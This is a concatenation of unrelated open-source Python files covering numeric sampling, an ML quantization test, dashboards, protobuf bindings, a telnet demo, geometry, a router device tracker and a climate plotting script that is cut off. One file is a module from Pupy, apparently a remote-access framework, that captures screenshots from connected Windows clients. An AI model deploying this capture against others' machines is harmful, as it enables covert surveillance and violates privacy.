sparsity = asStr(sparsity)
return constructSamplingNode(INPUTS, [OUTPUT_ID, ' = random.uniform(', rows, ',', cols, ',', sparsity, ',', low, ',', high, ')\n'])
def poisson(lam=1.0, size=(1,1), sparsity=1.0):
"""
Draw samples from a Poisson distribution.
Parameters
----------
lam: Expectation of interval, should be > 0.
size: Output shape (only tuple of length 2, i.e. (m, n), supported).
sparsity: Sparsity (between 0.0 and 1.0).
Examples
--------
>>> import systemml as sml
>>> import numpy as np
>>> sml.setSparkContext(sc)
>>> from systemml import random
>>> m1 = sml.random.poisson(lam=1, size=(3,3))
>>> m1.toNumPy()
array([[ 1., 0., 2.],
[ 1., 0., 0.],
[ 0., 0., 0.]])
"""
if len(size) != 2:
raise TypeError('Incorrect type for size. Expected tuple of length 2')
    global INPUTS
    INPUTS = []
rows = asStr(size[0])
cols = asStr(size[1])
lam = asStr(lam)
sparsity = asStr(sparsity)
return constructSamplingNode(INPUTS, [OUTPUT_ID, ' = random.poisson(', rows, ',', cols, ',', sparsity, ',', lam, ')\n'])
| apache-2.0 |
zigitax/pupy | pupy/modules/screenshot.py | 27 | 3951 | # -*- coding: UTF8 -*-
# --------------------------------------------------------------
# Copyright (c) 2015, Nicolas VERDIER ([email protected])
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
# --------------------------------------------------------------
from pupylib.PupyModule import *
from rpyc.utils.classic import download
import os
import os.path
import textwrap
import logging
import datetime
from zlib import compress, crc32
import struct
import subprocess
__class_name__="Screenshoter"
def pil_save(filename, pixels, width, height):
from PIL import Image, ImageFile
buffer_len = (width * 3 + 3) & -4
img = Image.frombuffer('RGB', (width, height), pixels, 'raw', 'BGR', buffer_len, 1)
ImageFile.MAXBLOCK = width * height
img=img.transpose(Image.FLIP_TOP_BOTTOM)
img.save(filename, quality=95, optimize=True, progressive=True)
logging.info('Screenshot saved to %s'%filename)
class Screenshoter(PupyModule):
""" take a screenshot :) """
@windows_only
def is_compatible(self):
pass
def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog='screenshot', description=self.__doc__)
self.arg_parser.add_argument('-e', '--enum', action='store_true', help='enumerate screen')
self.arg_parser.add_argument('-s', '--screen', type=int, default=None, help='take a screenshot on a specific screen (default all screen on one screenshot)')
self.arg_parser.add_argument('-v', '--view', action='store_true', help='directly open eog on the screenshot for preview')
def run(self, args):
try:
os.makedirs("./data/screenshots")
except Exception:
pass
self.client.load_package("pupwinutils.screenshot")
screens=None
if args.screen is None:
screens=self.client.conn.modules['pupwinutils.screenshot'].enum_display_monitors(oneshot=True)
else:
screens=self.client.conn.modules['pupwinutils.screenshot'].enum_display_monitors()
if args.enum:
res=""
for i, screen in enumerate(screens):
res+="{:<3}: {}\n".format(i,screen)
return res
if args.screen is None:
args.screen=0
selected_screen=screens[args.screen]
screenshot_pixels=self.client.conn.modules["pupwinutils.screenshot"].get_pixels(selected_screen)
filepath=os.path.join("./data/screenshots","scr_"+self.client.short_name()+"_"+str(datetime.datetime.now()).replace(" ","_").replace(":","-")+".jpg")
pil_save(filepath, screenshot_pixels, selected_screen["width"], selected_screen["height"])
if args.view:
subprocess.Popen(["eog",filepath])
self.success("screenshot saved to %s"%filepath)
| bsd-3-clause |
PaddlePaddle/Paddle | python/paddle/fluid/tests/unittests/mkldnn/test_quantize_mkldnn_op.py | 2 | 6353 | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from paddle.fluid.tests.unittests.op_test import OpTest
class TestQuantizeOp(OpTest):
def setUp(self):
self.op_type = 'quantize'
self.scale = 255.0
self.shift = 0.0
self.input_size = [1, 1, 5, 5] # Naive nChw16c
self.is_negative = False
self.output_format = 'NCHW'
self.set_scale()
self.set_shift()
self.set_is_negative()
self.set_input_size()
self.set_output_format()
self.prepare_input()
self.prepare_output()
def prepare_input(self):
if self.is_negative:
# input data values are from interval [-1.0, 1.0)
self.input = (2 * np.random.random_sample(self.input_size) - 1
).astype('float32')
else:
# input data values are from interval [0.0, 1.0)
self.input = (
np.random.random_sample(self.input_size)).astype('float32')
self.inputs = {'Input': OpTest.np_dtype_to_fluid_dtype(self.input)}
self.attrs = {
'Scale': self.scale,
'Shift': self.shift,
'is_negative_input': self.is_negative,
'output_format': self.output_format
}
def prepare_output(self):
input_data_type = 'int8' if self.is_negative else 'uint8'
output = np.rint(self.input * self.scale + self.shift).astype(
input_data_type)
self.outputs = {'Output': output}
def test_check_output(self):
# TODO(wangzhongpu): support mkldnn op in dygraph mode
self.check_output(check_dygraph=False)
def check_raise_error(self, msg):
try:
self.check_output()
except Exception as e:
if msg in str(e):
raise AttributeError
else:
print(e)
def set_scale(self):
pass
def set_shift(self):
pass
def set_is_negative(self):
pass
def set_input_size(self):
pass
def set_output_format(self):
pass
class TestQuantizeOp1(TestQuantizeOp):
def set_scale(self):
self.scale = 127.0
def set_is_negative(self):
        self.is_negative = True
class TestQuantizeOp2(TestQuantizeOp):
def set_scale(self):
self.scale = 255.0
def set_is_negative(self):
        self.is_negative = False
class TestQuantizeOp_ZeroScale(TestQuantizeOp):
def set_scale(self):
self.scale = 0.0
def prepare_output(self):
self.output = np.zeros(self.input_size)
self.outputs = {'Output': self.output}
def test_check_output(self):
self.assertRaises(AttributeError, self.check_raise_error,
'Quantization scale cannot be 0.0')
# 2-dim input
# P - positive input
class TestQuantizeOpShift_NCHW_2_P(TestQuantizeOp):
def set_output_format(self):
self.output_format = 'NCHW'
def set_is_negative(self):
        self.is_negative = False
def set_scale(self):
self.scale = 255.0
def set_shift(self):
self.shift = 0.0
def set_input_size(self):
self.input_size = [2, 3]
# 2-dim input
# N - negative input
class TestQuantizeOpShift_NCHW_2_N(TestQuantizeOpShift_NCHW_2_P):
def set_is_negative(self):
self.is_nagative = True
def set_scale(self):
self.scale = 127.0
def set_shift(self):
self.shift = 128.0
class TestQuantizeOpShift_NHWC_2_P(TestQuantizeOpShift_NCHW_2_P):
def set_output_format(self):
self.output_format = 'NHWC'
class TestQuantizeOpShift_NHWC_2_N(TestQuantizeOpShift_NCHW_2_N):
def set_output_format(self):
self.output_format = 'NHWC'
# 3-dim input
class TestQuantizeOpShift_NCHW_3_P(TestQuantizeOpShift_NCHW_2_P):
def set_input_size(self):
self.input_size = [2, 3, 4]
class TestQuantizeOpShift_NCHW_3_N(TestQuantizeOpShift_NCHW_2_N):
def set_input_size(self):
self.input_size = [2, 3, 4]
class TestQuantizeOpShift_NHWC_3_P(TestQuantizeOpShift_NCHW_3_P):
def set_output_format(self):
self.output_format = 'NHWC'
class TestQuantizeOpShift_NHWC_3_N(TestQuantizeOpShift_NCHW_3_N):
def set_output_format(self):
self.output_format = 'NHWC'
# 4-dim input
class TestQuantizeOpShift_NCHW_4_P(TestQuantizeOpShift_NCHW_2_P):
def set_input_size(self):
self.input_size = [2, 3, 4, 5]
class TestQuantizeOpShift_NCHW_4_N(TestQuantizeOpShift_NCHW_2_N):
def set_input_size(self):
self.input_size = [2, 3, 4, 5]
class TestQuantizeOpShift_NHWC_4_P(TestQuantizeOpShift_NCHW_4_P):
def set_output_format(self):
self.output_format = 'NHWC'
class TestQuantizeOpShift_NHWC_4_N(TestQuantizeOpShift_NCHW_4_N):
def set_output_format(self):
self.output_format = 'NHWC'
class TestQuantizeOp_NegativeShift(TestQuantizeOp):
def set_is_negative(self):
        self.is_negative = False
def set_scale(self):
self.scale = 100.0
def set_shift(self):
self.shift = -10.0
def prepare_output(self):
self.output = np.zeros(self.input_size)
self.outputs = {'Output': self.output}
def test_check_output(self):
self.assertRaises(AttributeError, self.check_raise_error,
'Quantization shift must be nonnegative.')
class TestQuantizeOp_TooBigShift(TestQuantizeOp_NegativeShift):
def set_shift(self):
self.shift = 300.0
def test_check_output(self):
self.assertRaises(
AttributeError, self.check_raise_error,
'Quantization shift must be less than or equal to 255.')
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
seler/gipsy | gipsy/dashboard/presets/google_analytics.py | 4 | 1666 | from gipsy.dashboard.dashboard import Dashboard
from gipsy.dashboard.widgets import widgets, widgets_google_analytics
class DashboardDefault(Dashboard):
"""
    Default and example class for dashboards using Google Analytics specific widgets.
    This class simply uses a render method where widgets are added. The widgets property is a list
    that can be appended to as shown below.
    The Google Analytics widgets are plug and play, but feel free to override them.
    Read the documentation for more information on how to set up Google Analytics on your application.
"""
def render(self):
# metrics evolution
self.widgets.append(widgets_google_analytics.WidgetGAPageViewsEvolution())
# metrics evolution
self.widgets.append(widgets_google_analytics.WidgetGASessionsEvolution())
# metrics single
self.widgets.append(widgets.WidgetMetricsSingle(
title='currently active users',
label='active users',
count=2564,
))
# line chart
self.widgets.append(widgets_google_analytics.WidgetGALineChart())
# metrics list
self.widgets.append(widgets.WidgetMetricsList(items=[
{'icon': 'fa-file-image-o', 'label': 'posts', 'value': 75},
{'icon': 'fa-comment-o', 'label': 'comments', 'value': 192},
{'icon': 'fa-files-o', 'label': 'pages', 'value': 12},
{'icon': 'fa-flag-o', 'label': 'in moderation', 'value': 4},
]))
# model list
self.widgets.append(widgets.WidgetModelList(items={}))
# admin logs
self.widgets.append(widgets.WidgetAdminLog())
| bsd-3-clause |
girishramnani/hacking-tools | pyhashcat/sre_yield/tests/test_cachingseq.py | 3 | 2039 | #!/usr/bin/env python2
#
# Copyright 2011-2014 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from sre_yield import cachingseq
class CachingFuncSequenceTest(unittest.TestCase):
def testLimits(self):
c = cachingseq.CachingFuncSequence(lambda i: i, 10)
self.assertEqual(9, c[9])
self.assertEqual(9, c[-1])
self.assertEqual(0, c[0])
self.assertEqual(0, c[-10])
self.assertRaises(IndexError, lambda: c[10])
self.assertRaises(IndexError, lambda: c[11])
self.assertRaises(IndexError, lambda: c[-11])
self.assertRaises(IndexError, lambda: c[-12])
self.assertEqual(2, len(c._cache))
# Make sure .func is settable at runtime...
c.func = lambda i: 'bbb'
self.assertEqual('bbb', c[1])
# ...and that we don't call it again.
self.assertEqual(0, c[0])
def testIter(self):
c = cachingseq.CachingFuncSequence(lambda i: i, 10)
# Cache empty on construction
self.assertEqual(0, len(c._cache))
self.assertEqual(10, len(c))
self.assertEqual(list(range(10)), list(c))
# Cache full after iteration
self.assertEqual(10, len(c._cache))
def testIncFunc(self):
def first_func(x):
assert x == 0
return 1
def inc_func(i, prev):
return prev * 2
c = cachingseq.CachingFuncSequence(first_func, 10, inc_func)
self.assertEqual([1, 2, 4, 8, 16, 32, 64, 128, 256, 512], list(c))
| mit |
earshel/PokeyPySnipe | POGOProtos/Networking/Requests/Messages/EncounterMessage_pb2.py | 16 | 3623 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Networking/Requests/Messages/EncounterMessage.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Networking/Requests/Messages/EncounterMessage.proto',
package='POGOProtos.Networking.Requests.Messages',
syntax='proto3',
serialized_pb=_b('\n>POGOProtos/Networking/Requests/Messages/EncounterMessage.proto\x12\'POGOProtos.Networking.Requests.Messages\"s\n\x10\x45ncounterMessage\x12\x14\n\x0c\x65ncounter_id\x18\x01 \x01(\x06\x12\x16\n\x0espawn_point_id\x18\x02 \x01(\t\x12\x17\n\x0fplayer_latitude\x18\x03 \x01(\x01\x12\x18\n\x10player_longitude\x18\x04 \x01(\x01\x62\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_ENCOUNTERMESSAGE = _descriptor.Descriptor(
name='EncounterMessage',
full_name='POGOProtos.Networking.Requests.Messages.EncounterMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='encounter_id', full_name='POGOProtos.Networking.Requests.Messages.EncounterMessage.encounter_id', index=0,
number=1, type=6, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='spawn_point_id', full_name='POGOProtos.Networking.Requests.Messages.EncounterMessage.spawn_point_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='player_latitude', full_name='POGOProtos.Networking.Requests.Messages.EncounterMessage.player_latitude', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='player_longitude', full_name='POGOProtos.Networking.Requests.Messages.EncounterMessage.player_longitude', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=107,
serialized_end=222,
)
DESCRIPTOR.message_types_by_name['EncounterMessage'] = _ENCOUNTERMESSAGE
EncounterMessage = _reflection.GeneratedProtocolMessageType('EncounterMessage', (_message.Message,), dict(
DESCRIPTOR = _ENCOUNTERMESSAGE,
__module__ = 'POGOProtos.Networking.Requests.Messages.EncounterMessage_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Networking.Requests.Messages.EncounterMessage)
))
_sym_db.RegisterMessage(EncounterMessage)
# @@protoc_insertion_point(module_scope)
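# --- Hedged usage sketch (added for illustration; not part of the generated
# module). Field names come from the descriptor above; the concrete values
# below are made-up placeholders.
def _example_encounter_message():
    msg = EncounterMessage()
    msg.encounter_id = 123456789          # fixed64 encounter identifier
    msg.spawn_point_id = 'spawn-001'      # hypothetical spawn point id
    msg.player_latitude = 37.7749         # placeholder coordinates
    msg.player_longitude = -122.4194
    return msg.SerializeToString()        # wire-format bytes for the request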
| mit |
google-code/android-scripting | python/src/Demo/sockets/telnet.py | 47 | 3010 | #! /usr/bin/env python
# Minimal interface to the Internet telnet protocol.
#
# It refuses all telnet options and does not recognize any of the other
# telnet commands, but can still be used to connect in line-by-line mode.
# It's also useful to play with a number of other services,
# like time, finger, smtp and even ftp.
#
# Usage: telnet host [port]
#
# The port may be a service name or a decimal port number;
# it defaults to 'telnet'.
import sys, posix, time
from socket import *
BUFSIZE = 1024
# Telnet protocol characters
IAC = chr(255) # Interpret as command
DONT = chr(254)
DO = chr(253)
WONT = chr(252)
WILL = chr(251)
def main():
host = sys.argv[1]
try:
hostaddr = gethostbyname(host)
except error:
sys.stderr.write(sys.argv[1] + ': bad host name\n')
sys.exit(2)
#
if len(sys.argv) > 2:
servname = sys.argv[2]
else:
servname = 'telnet'
#
if '0' <= servname[:1] <= '9':
port = eval(servname)
else:
try:
port = getservbyname(servname, 'tcp')
except error:
sys.stderr.write(servname + ': bad tcp service name\n')
sys.exit(2)
#
s = socket(AF_INET, SOCK_STREAM)
#
try:
s.connect((host, port))
except error, msg:
sys.stderr.write('connect failed: ' + repr(msg) + '\n')
sys.exit(1)
#
pid = posix.fork()
#
if pid == 0:
# child -- read stdin, write socket
while 1:
line = sys.stdin.readline()
s.send(line)
else:
# parent -- read socket, write stdout
iac = 0 # Interpret next char as command
opt = '' # Interpret next char as option
while 1:
data = s.recv(BUFSIZE)
if not data:
# EOF; kill child and exit
sys.stderr.write( '(Closed by remote host)\n')
posix.kill(pid, 9)
sys.exit(1)
cleandata = ''
for c in data:
if opt:
print ord(c)
s.send(opt + c)
opt = ''
elif iac:
iac = 0
if c == IAC:
cleandata = cleandata + c
elif c in (DO, DONT):
if c == DO: print '(DO)',
else: print '(DONT)',
opt = IAC + WONT
elif c in (WILL, WONT):
if c == WILL: print '(WILL)',
else: print '(WONT)',
opt = IAC + DONT
else:
print '(command)', ord(c)
elif c == IAC:
iac = 1
print '(IAC)',
else:
cleandata = cleandata + c
sys.stdout.write(cleandata)
sys.stdout.flush()
try:
main()
except KeyboardInterrupt:
pass
| apache-2.0 |
viralpandey/kivy | kivy/geometry.py | 47 | 3795 | '''
Geometry utilities
==================
This module contains some helper functions for geometric calculations.
'''
__all__ = ('circumcircle', 'minimum_bounding_circle')
from kivy.vector import Vector
def circumcircle(a, b, c):
'''
Computes the circumcircle of a triangle defined by a, b, c.
See: http://en.wikipedia.org/wiki/Circumscribed_circle
:Parameters:
`a` : iterable containing at least 2 values (for x and y)
The 1st point of the triangle.
`b` : iterable containing at least 2 values (for x and y)
The 2nd point of the triangle.
`c` : iterable containing at least 2 values (for x and y)
The 3rd point of the triangle.
:Return:
A tuple that defines the circle :
* The first element in the returned tuple is the center as (x, y)
* The second is the radius (float)
'''
P = Vector(a[0], a[1])
Q = Vector(b[0], b[1])
R = Vector(c[0], c[1])
mPQ = (P + Q) * .5
mQR = (Q + R) * .5
numer = -(- mPQ.y * R.y + mPQ.y * Q.y + mQR.y * R.y - mQR.y * Q.y
- mPQ.x * R.x + mPQ.x * Q.x + mQR.x * R.x - mQR.x * Q.x)
denom = (-Q.x * R.y + P.x * R.y - P.x * Q.y +
Q.y * R.x - P.y * R.x + P.y * Q.x)
t = numer / denom
cx = -t * (Q.y - P.y) + mPQ.x
cy = t * (Q.x - P.x) + mPQ.y
return ((cx, cy), (P - (cx, cy)).length())
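# --- Hedged example (added for illustration, not part of the original
# module): for the right triangle (0, 0), (1, 0), (0, 1) the circumcenter
# is the hypotenuse midpoint (0.5, 0.5) and the radius is sqrt(0.5).
def _circumcircle_example():
    (cx, cy), radius = circumcircle((0, 0), (1, 0), (0, 1))
    assert abs(cx - 0.5) < 1e-9 and abs(cy - 0.5) < 1e-9
    return (cx, cy), radius  # ((0.5, 0.5), ~0.7071)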
def minimum_bounding_circle(points):
'''
Returns the minimum bounding circle for a set of points.
For a description of the problem being solved, see the `Smallest Circle
Problem <http://en.wikipedia.org/wiki/Smallest_circle_problem>`_.
    The function uses Applet's Algorithm, the runtime is O(h^3 * n),
where h is the number of points in the convex hull of the set of points.
**But** it runs in linear time in almost all real world cases.
See: http://tinyurl.com/6e4n5yb
:Parameters:
`points` : iterable
A list of points (2 tuple with x,y coordinates)
:Return:
A tuple that defines the circle:
* The first element in the returned tuple is the center (x, y)
* The second the radius (float)
'''
points = [Vector(p[0], p[1]) for p in points]
if len(points) == 1:
return (points[0].x, points[0].y), 0.0
if len(points) == 2:
p1, p2 = points
return (p1 + p2) * .5, ((p1 - p2) * .5).length()
# determine a point P with the smallest y value
P = min(points, key=lambda p: p.y)
# find a point Q such that the angle of the line segment
# PQ with the x axis is minimal
def x_axis_angle(q):
if q == P:
return 1e10 # max val if the same, to skip
return abs((q - P).angle((1, 0)))
Q = min(points, key=x_axis_angle)
for p in points:
# find R such that angle PRQ is minimal
def angle_pq(r):
if r in (P, Q):
return 1e10 # max val if the same, to skip
return abs((r - P).angle(r - Q))
R = min(points, key=angle_pq)
# check for case 1 (angle PRQ is obtuse), the circle is determined
# by two points, P and Q. radius = |(P-Q)/2|, center = (P+Q)/2
if angle_pq(R) > 90.0:
return (P + Q) * .5, ((P - Q) * .5).length()
# if angle RPQ is obtuse, make P = R, and try again
if abs((R - P).angle(Q - P)) > 90:
P = R
continue
# if angle PQR is obtuse, make Q = R, and try again
if abs((P - Q).angle(R - Q)) > 90:
Q = R
continue
# all angles were acute..we just need the circle through the
# two points furthest apart!
break
# find the circumcenter for triangle given by P,Q,R
return circumcircle(P, Q, R)
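# --- Hedged example (illustration only): the four corners of the unit
# square share the circle centred at (0.5, 0.5) with radius sqrt(0.5).
def _minimum_bounding_circle_example():
    center, radius = minimum_bounding_circle([(0, 0), (1, 0), (1, 1), (0, 1)])
    return center, radius  # ((0.5, 0.5), ~0.7071)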
| mit |
teodoc/home-assistant | homeassistant/components/device_tracker/luci.py | 10 | 5820 | """
homeassistant.components.device_tracker.luci
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Device tracker platform that supports scanning an OpenWRT router for device
presence.
It's required that the luci RPC package is installed on the OpenWRT router:
# opkg install luci-mod-rpc
Configuration:
To use the Luci tracker you will need to add something like the following
to your config/configuration.yaml
device_tracker:
platform: luci
host: YOUR_ROUTER_IP
username: YOUR_ADMIN_USERNAME
password: YOUR_ADMIN_PASSWORD
Variables:
host
*Required
The IP address of your router, e.g. 192.168.1.1.
username
*Required
The username of a user with administrative privileges, usually 'admin'.
password
*Required
The password for your given admin account.
"""
import logging
import json
from datetime import timedelta
import re
import threading
import requests
from homeassistant.const import CONF_HOST, CONF_USERNAME, CONF_PASSWORD
from homeassistant.helpers import validate_config
from homeassistant.util import Throttle
from homeassistant.components.device_tracker import DOMAIN
# Return cached results if last scan was less than this time ago
MIN_TIME_BETWEEN_SCANS = timedelta(seconds=5)
_LOGGER = logging.getLogger(__name__)
def get_scanner(hass, config):
""" Validates config and returns a Luci scanner. """
if not validate_config(config,
{DOMAIN: [CONF_HOST, CONF_USERNAME, CONF_PASSWORD]},
_LOGGER):
return None
scanner = LuciDeviceScanner(config[DOMAIN])
return scanner if scanner.success_init else None
# pylint: disable=too-many-instance-attributes
class LuciDeviceScanner(object):
""" This class queries a wireless router running OpenWrt firmware
for connected devices. Adapted from Tomato scanner.
# opkg install luci-mod-rpc
for this to work on the router.
The API is described here:
http://luci.subsignal.org/trac/wiki/Documentation/JsonRpcHowTo
(Currently, we do only wifi iwscan, and no DHCP lease access.)
"""
def __init__(self, config):
host = config[CONF_HOST]
username, password = config[CONF_USERNAME], config[CONF_PASSWORD]
self.parse_api_pattern = re.compile(r"(?P<param>\w*) = (?P<value>.*);")
self.lock = threading.Lock()
self.last_results = {}
self.token = _get_token(host, username, password)
self.host = host
self.mac2name = None
self.success_init = self.token is not None
def scan_devices(self):
""" Scans for new devices and return a
list containing found device ids. """
self._update_info()
return self.last_results
def get_device_name(self, device):
""" Returns the name of the given device or None if we don't know. """
with self.lock:
if self.mac2name is None:
url = 'http://{}/cgi-bin/luci/rpc/uci'.format(self.host)
result = _req_json_rpc(url, 'get_all', 'dhcp',
params={'auth': self.token})
if result:
hosts = [x for x in result.values()
if x['.type'] == 'host' and
'mac' in x and 'name' in x]
mac2name_list = [
(x['mac'].upper(), x['name']) for x in hosts]
self.mac2name = dict(mac2name_list)
else:
# Error, handled in the _req_json_rpc
return
return self.mac2name.get(device.upper(), None)
@Throttle(MIN_TIME_BETWEEN_SCANS)
def _update_info(self):
""" Ensures the information from the Luci router is up to date.
Returns boolean if scanning successful. """
if not self.success_init:
return False
with self.lock:
_LOGGER.info("Checking ARP")
url = 'http://{}/cgi-bin/luci/rpc/sys'.format(self.host)
result = _req_json_rpc(url, 'net.arptable',
params={'auth': self.token})
if result:
self.last_results = []
for device_entry in result:
# Check if the Flags for each device contain
# NUD_REACHABLE and if so, add it to last_results
if int(device_entry['Flags'], 16) & 0x2:
self.last_results.append(device_entry['HW address'])
return True
return False
def _req_json_rpc(url, method, *args, **kwargs):
""" Perform one JSON RPC operation. """
data = json.dumps({'method': method, 'params': args})
try:
res = requests.post(url, data=data, timeout=5, **kwargs)
except requests.exceptions.Timeout:
_LOGGER.exception("Connection to the router timed out")
return
if res.status_code == 200:
try:
result = res.json()
except ValueError:
# If json decoder could not parse the response
_LOGGER.exception("Failed to parse response from luci")
return
try:
return result['result']
except KeyError:
_LOGGER.exception("No result in response from luci")
return
elif res.status_code == 401:
# Authentication error
_LOGGER.exception(
"Failed to authenticate, "
"please check your username and password")
return
else:
_LOGGER.error("Invalid response from luci: %s", res)
def _get_token(host, username, password):
""" Get authentication token for the given host+username+password """
url = 'http://{}/cgi-bin/luci/rpc/auth'.format(host)
return _req_json_rpc(url, 'login', username, password)
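# --- Hedged sketch of the wire format used above (illustration only; the
# host and credentials are placeholders). The login call POSTs a JSON body
# to the luci auth endpoint and expects {'result': <token>} back.
def _example_login_payload(host='192.168.1.1', username='admin',
                           password='secret'):
    url = 'http://{}/cgi-bin/luci/rpc/auth'.format(host)
    body = json.dumps({'method': 'login', 'params': [username, password]})
    return url, body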
| mit |
zmlabe/IceVarFigs | Scripts/SeaSurfaceTemperatures/plot_ersst5.py | 1 | 5197 | """
Plot selected years of monthly ERSSTv5 global data
Website : https://www1.ncdc.noaa.gov/pub/data/cmb/ersst/v5/netcdf/
Author : Zachary M. Labe
Date : 22 July 2017
"""
from netCDF4 import Dataset
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap, addcyclic, shiftgrid
import numpy as np
import datetime
import nclcmaps as ncm
### Read in data files from server
directoryfigure = './Figures/'
directorydata = './Data/'
### Define constants
now = datetime.datetime.now()
month = now.month
monthsq = [r'Jan',r'Feb',r'Mar',r'Apr',r'May',r'Jun',r'Jul',
r'Aug',r'Sep',r'Oct',r'Nov',r'Dec',r'Jan']
### Input selected years and months!
years = np.arange(1992,2016+1,1)
months = np.arange(1,12+1,1)
### Read in data
sst = np.empty((years.shape[0],months.shape[0],89,180))
for i in range(years.shape[0]):
for j in range(months.shape[0]):
filename = directorydata + 'ersst.v5.%s%02d.nc' % (years[i],
months[j])
data = Dataset(filename)
lats = data.variables['lat'][:]
lons = data.variables['lon'][:]
sst[i,j,:,:] = data.variables['sst'][0,0,:,:]
data.close()
print('Completed: Read %s year!' % years[i])
### Locate missing data
sst[np.where(sst == -999)] = np.nan
### Reshape data
sst = np.reshape(sst,(300,89,180))
### Create list of years for plotting
yearsqq = np.repeat(years,12)
###############################################################################
###############################################################################
###############################################################################
### Plot figure
### Define parameters (dark)
def setcolor(x, color):
for m in x:
for t in x[m][1]:
t.set_color(color)
plt.rc('text',usetex=True)
plt.rc('font',**{'family':'sans-serif','sans-serif':['Avant Garde']})
plt.rc('savefig',facecolor='black')
plt.rc('axes',edgecolor='k')
plt.rc('xtick',color='white')
plt.rc('ytick',color='white')
plt.rc('axes',labelcolor='white')
plt.rc('axes',facecolor='black')
### Select map type
style = 'global'
if style == 'ortho':
m = Basemap(projection='ortho',lon_0=-90,
lat_0=70,resolution='l',round=True)
elif style == 'polar':
m = Basemap(projection='npstere',boundinglat=67,lon_0=270,resolution='l',round =True)
elif style == 'global':
m = Basemap(projection='moll',lon_0=0,resolution='l',area_thresh=10000)
### Begin loop of years/months
for i in range(sst.shape[0]):
fig = plt.figure()
ax = plt.subplot(111)
for txt in fig.texts:
txt.set_visible(False)
var = sst[i,:,:]
m.drawmapboundary(fill_color='k')
m.drawcoastlines(color='k',linewidth=0.4)
### Colorbar limits
barlim = np.arange(0,31,5)
### Make the plot continuous
var, lons_cyclic = addcyclic(var, lons)
var, lons_cyclic = shiftgrid(180., var, lons_cyclic, start=False)
lon2d, lat2d = np.meshgrid(lons_cyclic, lats)
x, y = m(lon2d, lat2d)
cs = plt.contourf(x,y,var,np.arange(-1.8,31.1,1),
extend='max')
cmap = ncm.cmap('MPL_gnuplot')
cs.set_cmap(cmap)
t = plt.annotate(r'\textbf{%s}' % yearsqq[i],textcoords='axes fraction',
xy=(0,0), xytext=(0.34,1.03),
fontsize=50,color='w',alpha=0.6)
t1 = plt.annotate(r'\textbf{GRAPHIC}: Zachary Labe (@ZLabe)',
textcoords='axes fraction',
xy=(0,0), xytext=(0.02,-0.167),
fontsize=4.5,color='w',alpha=0.6)
t2 = plt.annotate(r'\textbf{SOURCE}: https://www1.ncdc.noaa.gov/',
